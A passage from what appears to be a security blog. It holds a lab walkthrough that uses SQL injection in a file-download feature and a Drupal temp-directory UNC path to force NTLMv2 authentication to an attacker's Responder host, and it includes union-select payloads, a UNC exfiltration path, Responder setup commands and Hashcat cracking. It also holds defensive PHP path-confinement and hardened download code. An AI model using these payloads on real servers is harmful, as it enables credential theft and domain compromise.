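        throw new UnsafePathException('NUL byte rejected');
    }
    foreach (preg_split('#[\\\\/]+#', $userInput) as $segment) {
        if ($segment === '..') {
            throw new UnsafePathException('traversal rejected');
        }
    }
    // 4. Anchor under the base directory and prove, after normalisation of
    //    symlinks/junctions, that the (existing) parent still lies inside it.
    $realBase = realpath($base);
    if ($realBase === false) {
        throw new RuntimeException('base directory does not exist');
    }
    $candidate  = $realBase . DIRECTORY_SEPARATOR . $userInput;
    $realParent = realpath(dirname($candidate));
    $prefix     = $realBase . DIRECTORY_SEPARATOR;
    if ($realParent === false
        || strncmp($realParent . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        throw new UnsafePathException('path escapes base directory');
    }
    return $realParent . DIRECTORY_SEPARATOR . basename($candidate);
}

// The interface from the post, routed through the wrapper. The inputs used
// above, "\\192.168.56.106\b0x" and "\\192.168.56.106\b0x.txt", now throw at
// step 1 and never reach PHP's path resolution.
function create_dir(string $base, string $name): bool
{
    return mkdir(confine_to_base($base, $name), 0750);
}
function remove_dir(string $base, string $name): bool
{
    return rmdir(confine_to_base($base, $name));
}
function delete_file(string $base, string $name): bool
{
    return unlink(confine_to_base($base, $name));
}
function copy_file(string $base, string $src, string $dst): bool
{
    return copy(confine_to_base($base, $src), confine_to_base($base, $dst));
}
```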
<div class="separator" style="clear: both; text-align: left;">
<span style="color: orange;"><b>Real-life scenario</b></span> - <span style="color: orange;"><b><span style="color: #9fc5e8;">Drupal (Tested on Version 7.6.6)</span> </b></span> </div>
The Drupal CMS admin panel has functionality to specify the path to temporary files via the "Temporary Directory" input field.<br />
<br />
In Drupal CMS below version 8.2.2, under the path "Configuration -> File System", there is an option to specify the path to temporary files. The user can specify a remote file system path as well, using a UNC path like "\\remote_file_system_IP\directory_name":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyzxLPJ7qcVNUufLwEuUb6QBXL_oRoU6vVnl4sjoPc87bJcGXYHHmREQ9C82WLx6r2X1oCR7gUaNBoI9IqjXaj0czhGOiS1wY9meGC4SZ3681SmXR4EmWZxn0VutBvQNdS1zrB1ImvZWA/s1600/drupal1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="920" data-original-width="1334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyzxLPJ7qcVNUufLwEuUb6QBXL_oRoU6vVnl4sjoPc87bJcGXYHHmREQ9C82WLx6r2X1oCR7gUaNBoI9IqjXaj0czhGOiS1wY9meGC4SZ3681SmXR4EmWZxn0VutBvQNdS1zrB1ImvZWA/s1600/drupal1.png" /></a></div>
<br />
In this case, I specified the UNC path to my attacker machine, on which Responder is listening on SMB port 445.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoloxewFoZjIWQSbNgPjR_0xTZr7lVXGMi-qzWdVgqZkkBawjeFq_s2YsdYmUdOSX3HGJAV9zXpaPY7G-QMr56eKAK7DogcVq4H0eLQjqPcFGD_qz31c9iZjmnaKl8fFqIW912JW7cis/s1600/drupal2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoloxewFoZjIWQSbNgPjR_0xTZr7lVXGMi-qzWdVgqZkkBawjeFq_s2YsdYmUdOSX3HGJAV9zXpaPY7G-QMr56eKAK7DogcVq4H0eLQjqPcFGD_qz31c9iZjmnaKl8fFqIW912JW7cis/s1600/drupal2.png" /></a></div>
<br />
Drupal CMS tried to access the remote file system, and Responder grabbed the NTLMv2 hash of the web application user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Yr4Z6Lr8L0M1jE5cpQGcEEQzrY9KQdYMcTHEbtBBHNiyZmz-eJyM3IPMTRhgWxbM7dY8lRcTGWOB68TFEWPRAS1FRK9sSvmjLk9k95elm9fVxaXPDYd4rKjouU0bXuvXA5ESvlwzW4M/s1600/drupal3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Yr4Z6Lr8L0M1jE5cpQGcEEQzrY9KQdYMcTHEbtBBHNiyZmz-eJyM3IPMTRhgWxbM7dY8lRcTGWOB68TFEWPRAS1FRK9sSvmjLk9k95elm9fVxaXPDYd4rKjouU0bXuvXA5ESvlwzW4M/s1600/drupal3.png" /></a></div>
<br />
The Drupal CMS interface error message shows that the script tried to create the directory on the remote file system at IP 192.168.1.105 using the mkdir() function.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_V_f9RBf2HTknDqEWKB0ToX9c5Zb9IZwA_sXBWGvukmTzFW3vMgvtnuRtlqj65slCLuUkuZFgsNqJHAtl7FZSJlIvqil7gUVLYyrRtSb6WRY_SCJl7EnT8Glgfj_JBYZhEbMTDyky78/s1600/drupal4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="910" data-original-width="1445" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_V_f9RBf2HTknDqEWKB0ToX9c5Zb9IZwA_sXBWGvukmTzFW3vMgvtnuRtlqj65slCLuUkuZFgsNqJHAtl7FZSJlIvqil7gUVLYyrRtSb6WRY_SCJl7EnT8Glgfj_JBYZhEbMTDyky78/s1600/drupal4.png" /></a></div>
<br />
The same behaviour was observed in phpBB (up to version 3.2.3) and Joomla CMS (latest version) <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Thanks for reading :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
Mannu Linux (http://www.blogger.com/profile/00618753918803236379), published 2020-01-12, updated 2023-11-23: Stealing NTLMv2 hash by abusing SQL injection in File download functionality <div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
Pranaam to All _/\_ :)<br />
<br />
In this blog post, I am going to explain a scenario in which an attacker can take advantage of an SQL Injection vulnerability to force the web server to leak the NTLMv2 hash.<br />
<br />
<span style="color: orange;"><b>Description of Vulnerability chain </b></span>
<br />
Here, we have a web application with an SQL Injection vulnerability in its file download functionality. The web application processes unsanitized user input in an SQL query and, on the basis of the query output, calls a file download function. The file download function searches for the file name (returned by the SQL query) on the web server's file system and streams it to the user for download.<br />
<br />
<br />
<span style="color: orange;"><b>Environment Setup</b></span><br />
My demo environment had the following configured in place to perform this:<br />
<ol style="text-align: left;">
<li><span style="color: #fff2cc;"><span style="background-color: black;">Windows Server 2012 box (IP - 192.168.56.2)</span></span></li>
<li><span style="color: #fff2cc;"><span style="background-color: black;">Windows 7 AD Client box (IP - 192.168.56.3)</span></span></li>
<li><span style="color: #fff2cc;"><span style="background-color: black;">Backbox Linux box (IP - 192.168.56.106)</span></span></li>
</ol>
Windows Server 2012 box: -<br />
This is the Active Directory Domain Controller machine.<br />
<br />
Windows 7 AD Client box: -<br />
This machine has Windows 7 installed and is part of the Windows Active Directory domain. The web application is hosted on this machine, and the web server runs with the privileges of one of the Active Directory domain users (user box). <br />
<div>
<br />
Backbox Linux box: -<br />
This is the attacker machine, on which the "<a href="https://github.com/lgandx/Responder" target="_blank">Responder</a>" tool is listening on port 445 for SMB (File Server Service) requests. <br />
<br />
<br />
<span style="color: orange;"><b>Attack scenario outline</b></span><br />
The web application is vulnerable to SQL Injection and returns the file name in the SQL query output. Here, an attacker can inject an SQL query that returns a custom file name as the query output. The web application then calls the file download functionality and passes the file name returned by the SQL query to that function. The file download function checks for the file in the locations below:<br />
<ol style="text-align: left;">
<li>Local file system</li>
<li>Remote file system (SMB)</li>
</ol>
The attacker needs to craft an SQL Injection query that returns a remote file system SMB path on which the Responder tool is listening. The file path should look like this: </div>
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">\\Responder_Server_IP\file_name</textarea>
<br />
<br />
In my case, the Responder machine IP is "192.168.56.106", so the path will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">\\192.168.56.106\box.txt</textarea><br />
<br />
The web application passes the Responder machine's SMB path as the file to the file download function.<br />
The file download function makes a request to the Responder machine to access the file "box.txt", and here Responder comes into action. Responder forces the web server to authenticate itself in order to access the file, and the web server forwards the authentication details to Responder.<br />
<br />
<br />
<span style="color: orange;"><b>Download and start Responder on attacker machine</b></span><br />
Download the tool and run it on an interface that is reachable from the web application server. In this case, the web application is hosted on the internal network with IP range "192.168.56.1-255", so Responder listens on the interface that has IP 192.168.56.106 (eth1).<br />
<br />
<textarea cols="45" rows="3" style="height: 60px; margin: 0px; width: 513px;">git clone https://github.com/lgandx/Responder-Windows.git
cd Responder-Windows
python Responder.py -I <interface_name>
</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXROKFTUbPNu-e0M3GKECtz2TpwHqpdCUq3BmfcYji7uv8upPpnUi_4hNJzN0jMGhTs1yEq4ir0EGvguvqzt_muDBMdOKgT9lJIuaHVy4jqkF_gfAhpS5gtdlhm0tx1TP0Hl2A0MryNNw/s1600/fd7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="828" data-original-width="1124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXROKFTUbPNu-e0M3GKECtz2TpwHqpdCUq3BmfcYji7uv8upPpnUi_4hNJzN0jMGhTs1yEq4ir0EGvguvqzt_muDBMdOKgT9lJIuaHVy4jqkF_gfAhpS5gtdlhm0tx1TP0Hl2A0MryNNw/s1600/fd7.png" /></a></div>
<br />
Interface name and IP on which Responder is listening:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NxLqhKovicVvs-oasdtcn7PAE5gGjKlwrVBTz9JM4nPzbXKewz1LR8W_vTxfvS24aYJdBfMv3qOGNw9Fn0f4pA1UnQQZG8NfqbBZWc8GWPMqfZVOF5LI4mTJCwpjH-poL0V0RSAdErc/s1600/fd8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="255" data-original-width="830" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NxLqhKovicVvs-oasdtcn7PAE5gGjKlwrVBTz9JM4nPzbXKewz1LR8W_vTxfvS24aYJdBfMv3qOGNw9Fn0f4pA1UnQQZG8NfqbBZWc8GWPMqfZVOF5LI4mTJCwpjH-poL0V0RSAdErc/s1600/fd8.png" /></a></div>
<br />
<span style="color: orange;"><b>Vulnerable code and web server environment</b></span><br />
The web application code that is vulnerable to SQL Injection is:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0h6T2I8XgvjoNQsAy-wMdBDkr9imkNg7Tnm5T4wuNHw4eiWkbMR7iJARf1Da7mXjUakQsv4RbUftHpe5pNIA89-HCvfvHSu0arXylbWMniBWT-zf_lW_0A-q5cY1HN9-p20vUn9XFdU/s1600/code.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="858" data-original-width="1181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie0h6T2I8XgvjoNQsAy-wMdBDkr9imkNg7Tnm5T4wuNHw4eiWkbMR7iJARf1Da7mXjUakQsv4RbUftHpe5pNIA89-HCvfvHSu0arXylbWMniBWT-zf_lW_0A-q5cY1HN9-p20vUn9XFdU/s1600/code.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The MySQL user is just a normal user account and does not have any special privileges such as "file_priv".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg-qchymNboEd2BmrLZJlCBdCgXBJHctplDrhpfY_jWqXjZwfFhrBBwCW5aLbnr5bLZ-7sWLAIjG9-qa_D9USRaJE9POXN5evwESqqKAfZdvxC4tWItugUNibOU5dZ3dYoQbK_3JngUL0/s1600/up1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="497" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg-qchymNboEd2BmrLZJlCBdCgXBJHctplDrhpfY_jWqXjZwfFhrBBwCW5aLbnr5bLZ-7sWLAIjG9-qa_D9USRaJE9POXN5evwESqqKAfZdvxC4tWItugUNibOU5dZ3dYoQbK_3JngUL0/s1600/up1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The vulnerable code is hosted on a machine running "Windows 7" with IP "192.168.56.3". This machine is part of the Windows Active Directory domain "lab.indishell.lab". </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWT9570bKlxjDL9v4lHWc7Li-mzAElRSqhv8l9Lw7WiNTYiWQlqvnMiFTd9EdumX1BUjU02OvGov7LA-LcR0XHK8o51REj5uZFGBbBIDZ67WjRO11wevsAsqA0YWlVEAuszJWsmIfgYQ/s1600/sys+info.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="780" data-original-width="1395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWT9570bKlxjDL9v4lHWc7Li-mzAElRSqhv8l9Lw7WiNTYiWQlqvnMiFTd9EdumX1BUjU02OvGov7LA-LcR0XHK8o51REj5uZFGBbBIDZ67WjRO11wevsAsqA0YWlVEAuszJWsmIfgYQ/s1600/sys+info.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The application's default behavior is that the user specifies an integer value in the HTTP GET parameter "image", and the application checks whether an image linked with the specified value exists. If an image exists for the specified value, the application prompts with a file download pop-up.</div>
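A hardened version of the handler described above, as an added example that is not the blog's code: the "image" parameter is bound as an integer through a prepared statement, and the file name that comes back from the database is confined to a fixed directory before anything is opened, so a UNC path such as the one used in this post can never reach the filesystem (and therefore never triggers an SMB connection). The $pdo connection, the images table and the C:\inetpub\wwwroot\images directory are assumptions.

```php
<?php
// Added example, not the blog's code. Assumptions: a PDO connection to MySQL
// in $pdo, a table images(id, name) and image files stored under IMAGE_DIR.
declare(strict_types=1);

const IMAGE_DIR = 'C:\\inetpub\\wwwroot\\images';   // hypothetical base directory

// Integer-based injection point: the value is validated as digits and bound as
// a parameter, so "order by" / "union select" text never becomes part of the query.
function lookupImageName(PDO $pdo, string $rawId): ?string
{
    if (!ctype_digit($rawId)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT name FROM images WHERE id = ?');
    $stmt->execute([(int) $rawId]);
    $name = $stmt->fetchColumn();
    return $name === false ? null : (string) $name;
}

// Second, independent layer: even if the database row were attacker-controlled,
// only a bare file name that resolves inside IMAGE_DIR may be opened. The
// separator check runs before realpath() on purpose: on Windows, realpath() on
// \\192.168.56.106\box.txt would already contact the SMB server.
function resolveDownloadPath(string $name, string $baseDir = IMAGE_DIR): ?string
{
    if ($name === '' || strpbrk($name, "\\/:") !== false || $name !== basename($name)) {
        return null;                                   // UNC, absolute or traversal path
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    // Containment check: the resolved file must lie under the base directory.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

function handleDownload(PDO $pdo, string $rawId): void
{
    $name = lookupImageName($pdo, $rawId);
    $path = $name === null ? null : resolveDownloadPath($name);
    if ($path === null) {
        // Log the rejected value: a UNC path here is the signature of this attack.
        error_log(sprintf('download rejected: image=%s name=%s', $rawId, var_export($name, true)));
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
}

handleDownload($pdo, (string) ($_GET['image'] ?? ''));
```

The two layers are deliberately independent: the prepared statement removes the injection, and the containment check means a bad row in the table, or a future query bug, still cannot turn the download function into an SMB client.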
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgJ6qaXoBJva0L2ZEZXX2CV4czHr0Csk53nYxERpkBjsHaBwXvC1uLQ91OpoILkJq3jCoCr7WUFy5FXRTZ7zcFiMEX0kFVsFF3A3QpdmBxseqWRbxJYFp2ymk2UJzXzdB8MI6ysfbHfQ/s1600/fd1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="733" data-original-width="1092" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgJ6qaXoBJva0L2ZEZXX2CV4czHr0Csk53nYxERpkBjsHaBwXvC1uLQ91OpoILkJq3jCoCr7WUFy5FXRTZ7zcFiMEX0kFVsFF3A3QpdmBxseqWRbxJYFp2ymk2UJzXzdB8MI6ysfbHfQ/s1600/fd1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="color: orange;"><b>Identify number of columns in current SQL query</b></span><br />
In our case, the injection point is vulnerable to integer-based SQL Injection.<br />
<br />
Remember, if the query executes properly and returns output, we get the file download pop-up. The application will not prompt with the file download pop-up if the SQL query does not execute properly or some SQL server error occurs.<br />
<br />
When a single quote was appended, the application showed an error message.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA-oK8B2hINN3EcpOxGRo4W6cN5_8oAV54M6cfcY6MdHUu8Th0fUsGQ5_SYs0viLbt2oNnh3rxp7l54bVfyYNyRytGYt6mn_82zwP8KzorYn00NbblHNAIhk6uA9s-xXD9mcUERgstWac/s1600/fd2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="997" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA-oK8B2hINN3EcpOxGRo4W6cN5_8oAV54M6cfcY6MdHUu8Th0fUsGQ5_SYs0viLbt2oNnh3rxp7l54bVfyYNyRytGYt6mn_82zwP8KzorYn00NbblHNAIhk6uA9s-xXD9mcUERgstWac/s1600/fd2.png" /></a></div>
<br />
Let's find out the column count by fuzzing the web application. To find the column count we use the "order by" clause and keep increasing its value until the web application stops giving the download pop-up.<br />
<br />
Application response when we injected the parameter with the SQL Injection payload "order by 1-- -".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvGbCnLr4cIJLRaL6Gqrq8VRsBuO_3dGVd5SQGg4TgAcaJH2ChFuJUEr_XssbVWQnzIQYGawImDHLN4rLKTyjUmV753NIbV5BzjuGwYjRwqYsXXBA5jiNJhiu8sOCd4lTs4HAAi4HmXGk/s1600/fd3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="710" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvGbCnLr4cIJLRaL6Gqrq8VRsBuO_3dGVd5SQGg4TgAcaJH2ChFuJUEr_XssbVWQnzIQYGawImDHLN4rLKTyjUmV753NIbV5BzjuGwYjRwqYsXXBA5jiNJhiu8sOCd4lTs4HAAi4HmXGk/s1600/fd3.png" /></a></div>
<br />
The web application stops prompting the file download pop-up when the value in the order by clause is increased from 1 to 4, which indicates that the number of columns used by the select statement is less than 4.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBo6jWQpEXz5KRd1qKAbMRMLy8Hfzc53Yhbxv8MtjcdXDBitNZsbEU9dbPY7aUhdP3vVWIRfgVXoZ7tgpywWF5wrTBlilrUeVwhzvfONqcBd0hho4kswYYfkQ67Au95uKrFcl8eehngDQ/s1600/fd4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="1099" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBo6jWQpEXz5KRd1qKAbMRMLy8Hfzc53Yhbxv8MtjcdXDBitNZsbEU9dbPY7aUhdP3vVWIRfgVXoZ7tgpywWF5wrTBlilrUeVwhzvfONqcBd0hho4kswYYfkQ67Au95uKrFcl8eehngDQ/s1600/fd4.png" /></a></div>
<br />
Now, inject the URL with a union statement with a column count of 3. The payload will be like this: -<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 1,2,3-- -</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWuYzFy-zGPZtHXV3G5IOm3CtZzXNZ06yYsTCwGq3UBFKyuHOL1vxRil_ZOIbSAAQM2Ls4Jgmg-x_I_Xib1KexEn38Fkf9nO6Y3Bj9Ree4cFfeDxAJ9f2AqJ4_Vhr42wPuUOwjeU8KACs/s1600/fd5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="706" data-original-width="1157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWuYzFy-zGPZtHXV3G5IOm3CtZzXNZ06yYsTCwGq3UBFKyuHOL1vxRil_ZOIbSAAQM2Ls4Jgmg-x_I_Xib1KexEn38Fkf9nO6Y3Bj9Ree4cFfeDxAJ9f2AqJ4_Vhr42wPuUOwjeU8KACs/s1600/fd5.png" /></a></div>
<br />
<span style="color: orange;"><b>Finding column number which is returning file name to file download function</b></span><b> </b><br />
<b>Note:</b><i>
Please make sure the actual value specified in the vulnerable parameter does not exist, so that the SQL query returns the result of the injected query. In this case, I appended "." to the value 2 to make it non-existent.</i> <br />
<br />
Now that we have the column count, we need to figure out which column number lets us define the path of the file.<br />
To do this, we put the file name or full path of the file (which we want to download) into each column in turn until we find the column number that passes the file name to the file download function.<br />
<br />
We can specify any system file, such as "/Windows/System32/drivers/etc/hosts", in the column and observe whether the application prompts with the file download pop-up.<br />
The SQL Injection payload will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 'file_name',2,3-- -</textarea><br />
<br />
And for the file "hosts" from the file system path "/Windows/System32/drivers/etc/", the payload will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select '/Windows/System32/drivers/etc/hosts',2,3-- -</textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUH5yYYxcObaLbUu-vojU5k0j8dSaaXSUCBcAVRnS5PFIRzrP53a5i0frf0hpa95F_mnWjHxTJ6ziP9hpLAQmv3rSasOCBPg3K5vN2n2dFNroBVKVAIvmFXGxkp8zzzfq6-J7Tz6589kE/s1600/hosts1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="681" data-original-width="1271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUH5yYYxcObaLbUu-vojU5k0j8dSaaXSUCBcAVRnS5PFIRzrP53a5i0frf0hpa95F_mnWjHxTJ6ziP9hpLAQmv3rSasOCBPg3K5vN2n2dFNroBVKVAIvmFXGxkp8zzzfq6-J7Tz6589kE/s1600/hosts1.png" /></a></div>
<br />
If the application does not prompt with the download pop-up, keep moving the file path through the column numbers. For example, to test whether column number 2 is the one returned by the SQL server to the file download function, the payload will be:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select 1,'/Windows/System32/drivers/etc/hosts',3-- -</textarea><br />
<br />
In my case, column number 3 is the column that returns the file path to the application.<br />
So, the payload below will return the file path of the "hosts" file to the file download function, and we will get the file download pop-up:<br />
<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 497px;">union select 1,2,'/Windows/System32/drivers/etc/hosts'-- -</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnajv5HER4KnTN0hMAW1MA5KssIKnTuZCQA3gZGzQfsAvmKOh_KrkiyyXN6owUGSjtfBxVcOcm_SSVxa7RG50_iB4CF_XnMylzKliTwENSaj6S0VTmXXnnSYRAo4TQ9GT4paPGWYONPX0/s1600/hosts.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="1264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnajv5HER4KnTN0hMAW1MA5KssIKnTuZCQA3gZGzQfsAvmKOh_KrkiyyXN6owUGSjtfBxVcOcm_SSVxa7RG50_iB4CF_XnMylzKliTwENSaj6S0VTmXXnnSYRAo4TQ9GT4paPGWYONPX0/s1600/hosts.png" /></a></div>
<br />
<span style="color: orange;"><b>Exploiting the SQL Injection to leak the NTLMv2 hash</b></span><br />
Now, once the column that returns the file path has been identified, we need to specify the IP of the machine running Responder together with an arbitrary file name.<br />
The payload will be like this:<br />
<textarea cols="45" rows="1" style="height: 30px; margin: 0px; width: 397px;">union select 1,2,'\\\\192.168.56.106\\box.txt'-- -</textarea><br />
<br />
Check your Responder terminal to see whether you received NTLMv2 hashes.<br />
In my case, I got the hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_kY23hTUqEsp5Pdm2BYdMjboy3wbHfm8qVU9fYNYMds0hBg-ThBqMB0VMJAWALwbHF69q4kRSzuF9swjC8BaPMS3_hMhd9TIoYpnngrBdShNqukjgZISQZ2YIXNQ6kzG9cR37D4pNT1I/s1600/fd9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="846" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_kY23hTUqEsp5Pdm2BYdMjboy3wbHfm8qVU9fYNYMds0hBg-ThBqMB0VMJAWALwbHF69q4kRSzuF9swjC8BaPMS3_hMhd9TIoYpnngrBdShNqukjgZISQZ2YIXNQ6kzG9cR37D4pNT1I/s1600/fd9.png" /></a></div>
<br />
<span style="color: orange;"><b>Cracking the NTLMv2 hash using Hashcat</b></span><br />
To get the plain text password from the captured NTLMv2 hash, we can try the Hashcat hash cracking tool.<br />
In this scenario, I tried a dictionary-based attack to check whether the plain text password of the NTLMv2 hash is present in the dictionary. The password was weak, so I got the plain text.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR5LgFsos3KTqGkSScIN5OyGBWUhoiVcHRvI1IO9PmrCrw6xO13YqU8FD8c9K_uIerMq6Rv0j9P6ojZUcx35TNCLygRAC8rdzJeiLLcmWY9i30B0TBhT6IElVShQEdq-s7NsZtdWa_P4M/s1600/fd10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR5LgFsos3KTqGkSScIN5OyGBWUhoiVcHRvI1IO9PmrCrw6xO13YqU8FD8c9K_uIerMq6Rv0j9P6ojZUcx35TNCLygRAC8rdzJeiLLcmWY9i30B0TBhT6IElVShQEdq-s7NsZtdWa_P4M/s1600/fd10.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
This NTLMv2 hash belongs to an Active Directory domain user with username "box". <br />
Now we have the username and password of a domain user. Use these credentials in further exploitation.<br />
<br />Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>, <a href="https://twitter.com/Pwsecspirit" target="_blank">Spirited wolf</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
